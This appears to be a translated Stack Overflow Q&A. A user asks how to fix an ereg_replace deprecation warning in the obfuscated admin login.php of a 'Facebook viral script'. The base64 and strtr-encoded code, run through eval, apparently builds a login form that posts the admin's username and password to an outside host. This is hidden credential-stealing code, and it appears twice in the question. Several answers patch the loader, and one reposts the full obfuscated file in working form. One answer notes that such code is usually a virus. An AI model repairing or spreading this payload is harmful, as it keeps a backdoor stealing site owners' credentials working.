0

我在我的 login.php 到管理员 cpanel 上收到此错误。我正在使用 Facebook 病毒脚本。

Deprecated: Function ereg_replace() is deprecated in /home/content/32/10528532/html/shockvideo/admincpanel/login.php(2) : eval()'d code on line 1

这是我的整个 php:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

如何解决?如果你可以请为像我这样的新手解释一下。谢谢。

4

8 回答 8

2

问题来自此代码

$_R = ereg_replace('__FILE__', "'" . $_F . "'", $_X);

用。。。来代替

$_R = preg_replace('/__FILE__/', "'" . $_F . "'", $_X);
于 2013-02-26T15:34:41.467 回答
2

用preg_replace替换它, ereg_replace 自 php 5.3 起已弃用

于 2013-02-26T15:24:15.357 回答
1

不推荐使用的函数是不应再使用的函数,将在 PHP 的某些未来版本中删除。

您应该使用一些替代方法,而不是使用它们。尝试使用preg_replace

于 2013-02-26T15:24:20.677 回答
0

我们以前都是新手。但是首先在 SO 上运行一个简单的搜索,即使使用 google 也可以找到很多。有时,我在谷歌上这样做 >

ereg_replace 站点:stackoverflow.com

然后按回车。这表明你想要你可能正在寻找。

现在回到你的问题,你能在 SO (Stackoverflow) 上读到这个吗

PHP ereg_replace 已弃用

于 2013-02-26T16:15:31.513 回答
0

这个写得很糟糕,可笑的“受保护”代码可以简单地通过替换来修复:

ereg_replace('pattern', 'replacement', $target);

和:

preg_replace('/pattern/', 'replacement', $target);

这给了你:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=preg_replace('/__FILE__/', "'".$_F."'", $_X);eval($_R);$_R=0;$_X=0;

其中编码为:

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXByZWdfcmVwbGFjZSgnL19fRklMRV9fLycsICInIi4kX0YuIiciLCAkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=

你想把它放在eval(base64_decode())最后的位置。

请注意,包含eval(base64_decode())的代码通常是病毒。如果通过扫描主机服务器上运行的进程开始“清理”它,请不要感到惊讶。

于 2013-02-26T16:15:42.070 回答
0

从头到尾:

将代码中的“eval”替换为“echo”。从控制台运行 php 脚本,你会得到这个 php 代码:

<?php
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?>

现在你看到了有问题的功能。

快速修复:将 ereg_replace 替换为 @ereg_replace。

记住:这只是隐藏警告。您需要重写代码并使用 preg_match(),因为您的代码依赖于一个已弃用的函数,该函数很快就会从 php 中删除。

这是您的固定代码:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');   $_R=@ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;?>
于 2013-02-26T16:04:36.590 回答
0

您的代码已编码。它看起来很容易逆转。从解码 base 64 字符串开始。解码后,您需要将一些数字替换为等效字母。

一旦你完成了,切换ereg_replacepreg_replace是微不足道的。相同的模式通常可以工作,但格式略有不同。

这是最后解码的部分。

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
于 2013-02-26T15:29:38.543 回答
-1

临时修复:将 ereg_replace() 更改为 @ereg_replace()。

这将隐藏警告。

但是你需要用 preg_replace() 重写代码。

于 2013-02-26T15:23:56.190 回答